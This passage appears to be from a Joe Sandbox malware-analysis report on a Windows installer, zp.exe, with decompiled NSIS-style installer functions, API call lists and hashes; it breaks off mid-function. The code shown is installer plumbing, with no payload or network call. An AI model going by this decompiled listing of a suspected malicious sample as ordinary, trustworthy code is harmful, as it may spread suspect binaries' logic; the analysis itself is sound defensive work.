                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B47
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00404B76
                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B84
                                                            • ShowWindow.USER32(?,00000005), ref: 00404B95
                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C92
                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404CF7
                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D0C
                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404D30
                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404D50
                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 00404D65
                                                            • GlobalFree.KERNEL32(00000000), ref: 00404D75
                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404DEE
                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00404E97
                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404EA6
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EC6
                                                            • ShowWindow.USER32(?,00000000), ref: 00404F14
                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F1F
                                                            • ShowWindow.USER32(00000000), ref: 00404F26
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                            • String ID: $M$N
                                                            • API String ID: 1638840714-813528018
                                                            • Opcode ID: 11184b33c8a0bad0ffedf065af9fcd562555c30c73c025eae7e35ea36ad120a5
                                                            • Instruction ID: 32328689aaf225a856d9d5e8400e1324cb9f7a0d0133e9a7d6c98aba065e8d61
                                                            • Opcode Fuzzy Hash: 11184b33c8a0bad0ffedf065af9fcd562555c30c73c025eae7e35ea36ad120a5
                                                            • Instruction Fuzzy Hash: 5D0270B0900209AFEB20DF54DD45AAE7BB5FB84315F10817AF610BA2E1D7789D42DF58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 83%
                                                            			E0040440A(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				long _v16;
                                                            				long _v20;
                                                            				char _v24;
                                                            				long _v28;
                                                            				char _v32;
                                                            				intOrPtr _v36;
                                                            				long _v40;
                                                            				signed int _v44;
                                                            				CHAR* _v52;
                                                            				intOrPtr _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				CHAR* _v68;
                                                            				void _v72;
                                                            				struct HWND__* _v76;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t78;
                                                            				long _t83;
                                                            				signed char* _t85;
                                                            				void* _t91;
                                                            				signed int _t92;
                                                            				signed char _t110;
                                                            				signed int _t114;
                                                            				struct HWND__** _t118;
                                                            				intOrPtr* _t134;
                                                            				CHAR* _t142;
                                                            				intOrPtr _t144;
                                                            				signed char _t145;
                                                            				signed int _t146;
                                                            				signed int _t150;
                                                            				signed int* _t152;
                                                            				signed int _t153;
                                                            				signed char* _t154;
                                                            				struct HWND__* _t159;
                                                            				struct HWND__* _t160;
                                                            				int _t162;
                                                            				intOrPtr _t198;
                                                            
                                                            				_t78 =  *0x41f4b8; // 0x6f40bc
                                                            				_v36 = _t78;
                                                            				_t142 = ( *(_t78 + 0x3c) << 0xa) + 0x424000;
                                                            				_v12 =  *((intOrPtr*)(_t78 + 0x38));
                                                            				if(_a8 == 0x40b) {
                                                            					E004054D6(0x3fb, _t142);
                                                            					E00405F49(_t142);
                                                            				}
                                                            				_t160 = _a4;
                                                            				if(_a8 != 0x110) {
                                                            					L8:
                                                            					if(_a8 != 0x111) {
                                                            						L20:
                                                            						if(_a8 == 0x40f) {
                                                            							L22:
                                                            							_v8 = _v8 & 0x00000000;
                                                            							_v12 = _v12 & 0x00000000;
                                                            							E004054D6(0x3fb, _t142);
                                                            							if(E0040585C(_t179, _t142) == 0) {
                                                            								_v8 = 1;
                                                            							}
                                                            							E00405CDE(0x41ecb0, _t142);
                                                            							_t152 = 0;
                                                            							_t83 = E00406009(0);
                                                            							_v16 = _t83;
                                                            							if(_t83 == 0 || 0 == 0x41ecb0) {
                                                            								L30:
                                                            								E00405CDE(0x41ecb0, _t142);
                                                            								_t85 = E00405807(0x41ecb0);
                                                            								if(_t85 != 0) {
                                                            									 *_t85 =  *_t85 & 0x00000000;
                                                            								}
                                                            								if(GetDiskFreeSpaceA(0x41ecb0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                                            									_t153 = _a8;
                                                            									goto L36;
                                                            								} else {
                                                            									_t162 = 0x400;
                                                            									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                                                            									_v12 = 1;
                                                            									goto L37;
                                                            								}
                                                            							} else {
                                                            								while(1) {
                                                            									_t110 = _v16(0x41ecb0,  &_v44,  &_v32,  &_v24);
                                                            									if(_t110 != 0) {
                                                            										break;
                                                            									}
                                                            									if(_t152 != 0) {
                                                            										 *_t152 =  *_t152 & _t110;
                                                            									}
                                                            									_t154 = E004057B5(0x41ecb0);
                                                            									 *_t154 =  *_t154 & 0x00000000;
                                                            									_t152 = _t154 - 1;
                                                            									 *_t152 = 0x5c;
                                                            									if(_t152 != 0x41ecb0) {
                                                            										continue;
                                                            									} else {
                                                            										goto L30;
                                                            									}
                                                            								}
                                                            								_v16 = 0xa;
                                                            								_t145 = _v16;
                                                            								_t150 = _v40;
                                                            								_v40 = _t150 >> _t145;
                                                            								_t153 = (_t150 << 0x00000020 | _v44) >> _t145;
                                                            								_v12 = 1;
                                                            								L36:
                                                            								_t162 = 0x400;
                                                            								L37:
                                                            								_t91 = E00404867(5);
                                                            								if(_v12 != 0 && _t153 < _t91) {
                                                            									_v8 = 2;
                                                            								}
                                                            								_t144 =  *0x422ebc; // 0x6f57cb
                                                            								if( *((intOrPtr*)(_t144 + 0x10)) != 0) {
                                                            									E004047B2(0x3ff, 0xfffffffb, _t91);
                                                            									if(_v12 == 0) {
                                                            										SetDlgItemTextA(_a4, _t162, 0x41eca0);
                                                            									} else {
                                                            										E004047B2(_t162, 0xfffffffc, _t153);
                                                            									}
                                                            								}
                                                            								_t92 = _v8;
                                                            								 *0x423784 = _t92;
                                                            								if(_t92 == 0) {
                                                            									_v8 = E0040140B(7);
                                                            								}
                                                            								if(( *(_v36 + 0x14) & _t162) != 0) {
                                                            									_v8 = 0;
                                                            								}
                                                            								E00403FEE(0 | _v8 == 0x00000000);
                                                            								if(_v8 == 0) {
                                                            									_t198 =  *0x41fcd0; // 0x0
                                                            									if(_t198 == 0) {
                                                            										E0040439F();
                                                            									}
                                                            								}
                                                            								 *0x41fcd0 = 0;
                                                            								goto L52;
                                                            							}
                                                            						}
                                                            						_t179 = _a8 - 0x405;
                                                            						if(_a8 != 0x405) {
                                                            							goto L52;
                                                            						}
                                                            						goto L22;
                                                            					}
                                                            					_t114 = _a12 & 0x0000ffff;
                                                            					if(_t114 != 0x3fb) {
                                                            						L12:
                                                            						if(_t114 == 0x3e9) {
                                                            							_t146 = 7;
                                                            							memset( &_v72, 0, _t146 << 2);
                                                            							_v76 = _t160;
                                                            							_v68 = 0x41fce0;
                                                            							_v56 = E0040474C;
                                                            							_v52 = _t142;
                                                            							_v64 = E00405D00(_t142, 0x41fce0, _t160, 0x41f0b8, _v12);
                                                            							_t118 =  &_v76;
                                                            							_v60 = 0x41;
                                                            							__imp__SHBrowseForFolderA(_t118);
                                                            							if(_t118 == 0) {
                                                            								_a8 = 0x40f;
                                                            							} else {
                                                            								__imp__CoTaskMemFree(_t118);
                                                            								E0040576E(_t142);
                                                            								_t121 =  *((intOrPtr*)( *0x4236f0 + 0x11c));
                                                            								if( *((intOrPtr*)( *0x4236f0 + 0x11c)) != 0 && _t142 == "C:\\Users\\Arthur\\Vkstcentrene\\unprotuberant") {
                                                            									E00405D00(_t142, 0x41fce0, _t160, 0, _t121);
                                                            									if(lstrcmpiA(0x422680, 0x41fce0) != 0) {
                                                            										lstrcatA(_t142, 0x422680);
                                                            									}
                                                            								}
                                                            								 *0x41fcd0 =  *0x41fcd0 + 1;
                                                            								SetDlgItemTextA(_t160, 0x3fb, _t142);
                                                            							}
                                                            						}
                                                            						goto L20;
                                                            					}
                                                            					if(_a12 >> 0x10 != 0x300) {
                                                            						goto L52;
                                                            					}
                                                            					_a8 = 0x40f;
                                                            					goto L12;
                                                            				} else {
                                                            					_t159 = GetDlgItem(_t160, 0x3fb);
                                                            					if(E004057DB(_t142) != 0 && E00405807(_t142) == 0) {
                                                            						E0040576E(_t142);
                                                            					}
                                                            					 *0x422eb8 = _t160;
                                                            					SetWindowTextA(_t159, _t142);
                                                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                            					_push(1);
                                                            					E00403FCC(_t160);
                                                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                            					_push(0x14);
                                                            					E00403FCC(_t160);
                                                            					E00404001(_t159);
                                                            					_t134 = E00406009(7);
                                                            					if(_t134 == 0) {
                                                            						L52:
                                                            						return E00404033(_a8, _a12, _a16);
                                                            					} else {
                                                            						 *_t134(_t159, 1);
                                                            						goto L8;
                                                            					}
                                                            				}
                                                            			}












































                                                            0x00404410
                                                            0x00404416
                                                            0x00404423
                                                            0x00404431
                                                            0x00404434
                                                            0x0040443c
                                                            0x00404442
                                                            0x00404442
                                                            0x0040444e
                                                            0x00404451
                                                            0x004044bf
                                                            0x004044c6
                                                            0x0040459d
                                                            0x004045a4
                                                            0x004045b3
                                                            0x004045b3
                                                            0x004045b7
                                                            0x004045c1
                                                            0x004045ce
                                                            0x004045d0
                                                            0x004045d0
                                                            0x004045de
                                                            0x004045e3
                                                            0x004045e6
                                                            0x004045ed
                                                            0x004045f0
                                                            0x00404625
                                                            0x00404627
                                                            0x0040462d
                                                            0x00404634
                                                            0x00404636
                                                            0x00404636
                                                            0x00404652
                                                            0x00404699
                                                            0x00000000
                                                            0x00404654
                                                            0x00404657
                                                            0x0040466b
                                                            0x0040466d
                                                            0x00000000
                                                            0x0040466d
                                                            0x004045f8
                                                            0x004045f8
                                                            0x00404605
                                                            0x0040460a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040460e
                                                            0x00404610
                                                            0x00404610
                                                            0x00404618
                                                            0x0040461a
                                                            0x0040461d
                                                            0x00404620
                                                            0x00404623
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404623
                                                            0x00404676
                                                            0x0040467d
                                                            0x00404683
                                                            0x0040468b
                                                            0x0040468e
                                                            0x00404690
                                                            0x0040469c
                                                            0x0040469c
                                                            0x004046a1
                                                            0x004046a3
                                                            0x004046ad
                                                            0x004046b3
                                                            0x004046b3
                                                            0x004046ba
                                                            0x004046c3
                                                            0x004046cd
                                                            0x004046d5
                                                            0x004046eb
                                                            0x004046d7
                                                            0x004046db
                                                            0x004046db
                                                            0x004046d5
                                                            0x004046f0
                                                            0x004046f5
                                                            0x004046fa
                                                            0x00404703
                                                            0x00404703
                                                            0x0040470c
                                                            0x0040470e
                                                            0x0040470e
                                                            0x0040471a
                                                            0x00404722
                                                            0x00404724
                                                            0x0040472a
                                                            0x0040472c
                                                            0x0040472c
                                                            0x0040472a
                                                            0x00404731
                                                            0x00000000
                                                            0x00404731
                                                            0x004045f0
                                                            0x004045a6
                                                            0x004045ad
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004045ad
                                                            0x004044cc
                                                            0x004044d5
                                                            0x004044ef
                                                            0x004044f4
                                                            0x004044fe
                                                            0x00404505
                                                            0x00404511
                                                            0x00404514
                                                            0x00404517
                                                            0x0040451e
                                                            0x00404526
                                                            0x00404529
                                                            0x0040452d
                                                            0x00404534
                                                            0x0040453c
                                                            0x00404596
                                                            0x0040453e
                                                            0x0040453f
                                                            0x00404546
                                                            0x00404550
                                                            0x00404558
                                                            0x00404565
                                                            0x00404579
                                                            0x0040457d
                                                            0x0040457d
                                                            0x00404579
                                                            0x00404582
                                                            0x0040458f
                                                            0x0040458f
                                                            0x0040453c
                                                            0x00000000
                                                            0x004044f4
                                                            0x004044e2
                                                            0x00000000
                                                            0x00000000
                                                            0x004044e8
                                                            0x00000000
                                                            0x00404453
                                                            0x00404460
                                                            0x00404469
                                                            0x00404476
                                                            0x00404476
                                                            0x0040447d
                                                            0x00404483
                                                            0x0040448c
                                                            0x0040448f
                                                            0x00404492
                                                            0x0040449a
                                                            0x0040449d
                                                            0x004044a0
                                                            0x004044a6
                                                            0x004044ad
                                                            0x004044b4
                                                            0x00404737
                                                            0x00404749
                                                            0x004044ba
                                                            0x004044bd
                                                            0x00000000
                                                            0x004044bd
                                                            0x004044b4

                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404459
                                                            • SetWindowTextA.USER32(00000000,?), ref: 00404483
                                                            • SHBrowseForFolderA.SHELL32(?,0041F0B8,?), ref: 00404534
                                                            • CoTaskMemFree.OLE32(00000000), ref: 0040453F
                                                            • lstrcmpiA.KERNEL32(Call,Bogtilrettelgnings82 Setup: Installing), ref: 00404571
                                                            • lstrcatA.KERNEL32(?,Call), ref: 0040457D
                                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040458F
                                                              • Part of subcall function 004054D6: GetDlgItemTextA.USER32(?,?,00000400,004045C6), ref: 004054E9
                                                              • Part of subcall function 00405F49: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\zp.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 00405FA1
                                                              • Part of subcall function 00405F49: CharNextA.USER32(?,?,?,00000000), ref: 00405FAE
                                                              • Part of subcall function 00405F49: CharNextA.USER32(?,"C:\Users\user\Desktop\zp.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 00405FB3
                                                              • Part of subcall function 00405F49: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,776C3410,004033C9), ref: 00405FC3
                                                            • GetDiskFreeSpaceA.KERNEL32(0041ECB0,?,?,0000040F,?,0041ECB0,0041ECB0,?,00000000,0041ECB0,?,?,000003FB,?), ref: 0040464A
                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404665
                                                            • SetDlgItemTextA.USER32(00000000,00000400,0041ECA0), ref: 004046EB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                            • String ID: A$Bogtilrettelgnings82 Setup: Installing$C:\Users\user\Vkstcentrene\unprotuberant$Call
                                                            • API String ID: 2246997448-3605494348
                                                            • Opcode ID: 99c887e1a025992634fa2cd334c38f52200385e1e80dd5a9bae78a5bdda81e84
                                                            • Instruction ID: 42693497c20c2ef9f3724f7af4168125946a8ca29daa8f58ebac9689f75dac72
                                                            • Opcode Fuzzy Hash: 99c887e1a025992634fa2cd334c38f52200385e1e80dd5a9bae78a5bdda81e84
                                                            • Instruction Fuzzy Hash: B49170B1900209ABDB11AFA1CD85BAF77B8EF85314F10847BF701B62C1D77C9A418B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 74%
                                                            			E00402036() {
                                                            				void* _t49;
                                                            				intOrPtr* _t53;
                                                            				intOrPtr* _t55;
                                                            				intOrPtr* _t57;
                                                            				signed int _t61;
                                                            				intOrPtr* _t62;
                                                            				intOrPtr* _t64;
                                                            				intOrPtr* _t66;
                                                            				intOrPtr* _t68;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr* _t73;
                                                            				intOrPtr* _t76;
                                                            				int _t79;
                                                            				intOrPtr* _t91;
                                                            				intOrPtr* _t98;
                                                            				void* _t101;
                                                            				void* _t102;
                                                            
                                                            				 *(_t102 - 0x30) = E004029FD(0xfffffff0);
                                                            				 *(_t102 - 0x34) = E004029FD(0xffffffdf);
                                                            				 *((intOrPtr*)(_t102 - 0x2c)) = E004029FD(2);
                                                            				_t98 = E004029FD(0xffffffcd);
                                                            				 *((intOrPtr*)(_t102 - 0x44)) = E004029FD(0x45);
                                                            				if(E004057DB( *(_t102 - 0x34)) == 0) {
                                                            					E004029FD(0x21);
                                                            				}
                                                            				_t49 = _t102 + 8;
                                                            				__imp__CoCreateInstance(0x407384, _t79, 1, 0x407374, _t49);
                                                            				if(_t49 < _t79) {
                                                            					L15:
                                                            					 *((intOrPtr*)(_t102 - 4)) = 1;
                                                            					_push(0xfffffff0);
                                                            				} else {
                                                            					_t53 =  *((intOrPtr*)(_t102 + 8));
                                                            					_t101 =  *((intOrPtr*)( *_t53))(_t53, 0x407394, _t102 - 8);
                                                            					if(_t101 >= _t79) {
                                                            						_t57 =  *((intOrPtr*)(_t102 + 8));
                                                            						_t101 =  *((intOrPtr*)( *_t57 + 0x50))(_t57,  *(_t102 - 0x34));
                                                            						if(( *(_t102 - 0x13) & 0x00000080) == 0) {
                                                            							_t76 =  *((intOrPtr*)(_t102 + 8));
                                                            							 *((intOrPtr*)( *_t76 + 0x24))(_t76, "C:\\Users\\Arthur\\Vkstcentrene\\unprotuberant\\Benediktinerklostrets\\Rehandles\\Abortionist\\Korses");
                                                            						}
                                                            						_t61 =  *(_t102 - 0x14) >> 0x00000008 & 0x0000007f;
                                                            						if(_t61 != 0) {
                                                            							_t91 =  *((intOrPtr*)(_t102 + 8));
                                                            							 *((intOrPtr*)( *_t91 + 0x3c))(_t91, _t61);
                                                            						}
                                                            						_t62 =  *((intOrPtr*)(_t102 + 8));
                                                            						 *((intOrPtr*)( *_t62 + 0x34))(_t62,  *(_t102 - 0x14) >> 0x10);
                                                            						if( *_t98 != _t79) {
                                                            							_t73 =  *((intOrPtr*)(_t102 + 8));
                                                            							 *((intOrPtr*)( *_t73 + 0x44))(_t73, _t98,  *(_t102 - 0x14) & 0x000000ff);
                                                            						}
                                                            						_t64 =  *((intOrPtr*)(_t102 + 8));
                                                            						 *((intOrPtr*)( *_t64 + 0x2c))(_t64,  *((intOrPtr*)(_t102 - 0x2c)));
                                                            						_t66 =  *((intOrPtr*)(_t102 + 8));
                                                            						 *((intOrPtr*)( *_t66 + 0x1c))(_t66,  *((intOrPtr*)(_t102 - 0x44)));
                                                            						if(_t101 >= _t79) {
                                                            							_t101 = 0x80004005;
                                                            							if(MultiByteToWideChar(_t79, _t79,  *(_t102 - 0x30), 0xffffffff,  *(_t102 - 0x34), 0x400) != 0) {
                                                            								_t71 =  *((intOrPtr*)(_t102 - 8));
                                                            								_t101 =  *((intOrPtr*)( *_t71 + 0x18))(_t71,  *(_t102 - 0x34), 1);
                                                            							}
                                                            						}
                                                            						_t68 =  *((intOrPtr*)(_t102 - 8));
                                                            						 *((intOrPtr*)( *_t68 + 8))(_t68);
                                                            					}
                                                            					_t55 =  *((intOrPtr*)(_t102 + 8));
                                                            					 *((intOrPtr*)( *_t55 + 8))(_t55);
                                                            					if(_t101 >= _t79) {
                                                            						_push(0xfffffff4);
                                                            					} else {
                                                            						goto L15;
                                                            					}
                                                            				}
                                                            				E00401423();
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t102 - 4));
                                                            				return 0;
                                                            			}




















                                                            0x0040203f
                                                            0x00402049
                                                            0x00402053
                                                            0x0040205d
                                                            0x00402067
                                                            0x00402071
                                                            0x00402075
                                                            0x00402075
                                                            0x0040207a
                                                            0x0040208b
                                                            0x00402093
                                                            0x00402173
                                                            0x00402173
                                                            0x0040217a
                                                            0x00402099
                                                            0x00402099
                                                            0x004020aa
                                                            0x004020ae
                                                            0x004020b4
                                                            0x004020c4
                                                            0x004020c6
                                                            0x004020c8
                                                            0x004020d3
                                                            0x004020d3
                                                            0x004020dc
                                                            0x004020df
                                                            0x004020e1
                                                            0x004020e8
                                                            0x004020e8
                                                            0x004020ee
                                                            0x004020f8
                                                            0x004020fd
                                                            0x00402102
                                                            0x00402110
                                                            0x00402110
                                                            0x00402113
                                                            0x0040211c
                                                            0x0040211f
                                                            0x00402128
                                                            0x0040212d
                                                            0x00402134
                                                            0x0040214b
                                                            0x0040214d
                                                            0x0040215b
                                                            0x0040215b
                                                            0x0040214b
                                                            0x0040215d
                                                            0x00402163
                                                            0x00402163
                                                            0x00402166
                                                            0x0040216c
                                                            0x00402171
                                                            0x00402186
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00402171
                                                            0x0040217c
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                                            Strings
                                                            • C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses, xrefs: 004020CB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                            • String ID: C:\Users\user\Vkstcentrene\unprotuberant\Benediktinerklostrets\Rehandles\Abortionist\Korses
                                                            • API String ID: 123533781-3466177333
                                                            • Opcode ID: 729bbdcfb833e55362a4fa264fd64119e5fa5037f146b723465f27495cde836d
                                                            • Instruction ID: 06e6b23027def8a4d5e6b724cf519ff4addaa20e67256fcdff0c37d24eef8e92
                                                            • Opcode Fuzzy Hash: 729bbdcfb833e55362a4fa264fd64119e5fa5037f146b723465f27495cde836d
                                                            • Instruction Fuzzy Hash: EA417D71A00209BFCB00EFA4CE88E9E7BB5BF48354B2042A9F911FB2D0D6799D41DB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
                                                            			E00402645(char __ebx, char* __edi, char* __esi) {
                                                            				void* _t19;
                                                            
                                                            				if(FindFirstFileA(E004029FD(2), _t19 - 0x1a4) != 0xffffffff) {
                                                            					E00405C3C(__edi, _t6);
                                                            					_push(_t19 - 0x178);
                                                            					_push(__esi);
                                                            					E00405CDE();
                                                            				} else {
                                                            					 *__edi = __ebx;
                                                            					 *__esi = __ebx;
                                                            					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                            				}
                                                            				 *0x423768 =  *0x423768 +  *((intOrPtr*)(_t19 - 4));
                                                            				return 0;
                                                            			}




                                                            0x0040265d
                                                            0x00402671
                                                            0x0040267c
                                                            0x0040267d
                                                            0x004027b8
                                                            0x0040265f
                                                            0x0040265f
                                                            0x00402661
                                                            0x00402663
                                                            0x00402663
                                                            0x00402895
                                                            0x004028a1

                                                            APIs
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: 7411a04c3bdd138215f4fbedaa66117d5148ebc289ac93fdb3f5d6d7506025b5
                                                            • Instruction ID: db1172372b73d17c9e5c842b05e6fc1add0f007f89b28e5155f99bf94e6db886
                                                            • Opcode Fuzzy Hash: 7411a04c3bdd138215f4fbedaa66117d5148ebc289ac93fdb3f5d6d7506025b5
                                                            • Instruction Fuzzy Hash: 63F0A772508114ABE700E7749949AEE7768DF51314F60457BE141F60C1D3B84941DB2A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 94%
                                                            			E00404115(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                            				char* _v8;
                                                            				signed int _v12;
                                                            				void* _v16;
                                                            				struct HWND__* _t52;
                                                            				long _t86;
                                                            				int _t98;
                                                            				struct HWND__* _t99;
                                                            				signed int _t100;
                                                            				intOrPtr _t103;
                                                            				signed int _t106;
                                                            				intOrPtr _t107;
                                                            				intOrPtr _t109;
                                                            				int _t110;
                                                            				signed int* _t112;
                                                            				signed int _t113;
                                                            				char* _t114;
                                                            				CHAR* _t115;
                                                            
                                                            				if(_a8 != 0x110) {
                                                            					__eflags = _a8 - 0x111;
                                                            					if(_a8 != 0x111) {
                                                            						L11:
                                                            						__eflags = _a8 - 0x4e;
                                                            						if(_a8 != 0x4e) {
                                                            							__eflags = _a8 - 0x40b;
                                                            							if(_a8 == 0x40b) {
                                                            								 *0x41ecac =  *0x41ecac + 1;
                                                            								__eflags =  *0x41ecac;
                                                            							}
                                                            							L25:
                                                            							_t110 = _a16;
                                                            							L26:
                                                            							return E00404033(_a8, _a12, _t110);
                                                            						}
                                                            						_t52 = GetDlgItem(_a4, 0x3e8);
                                                            						_t110 = _a16;
                                                            						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                                                            						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
                                                            							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                                                            							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
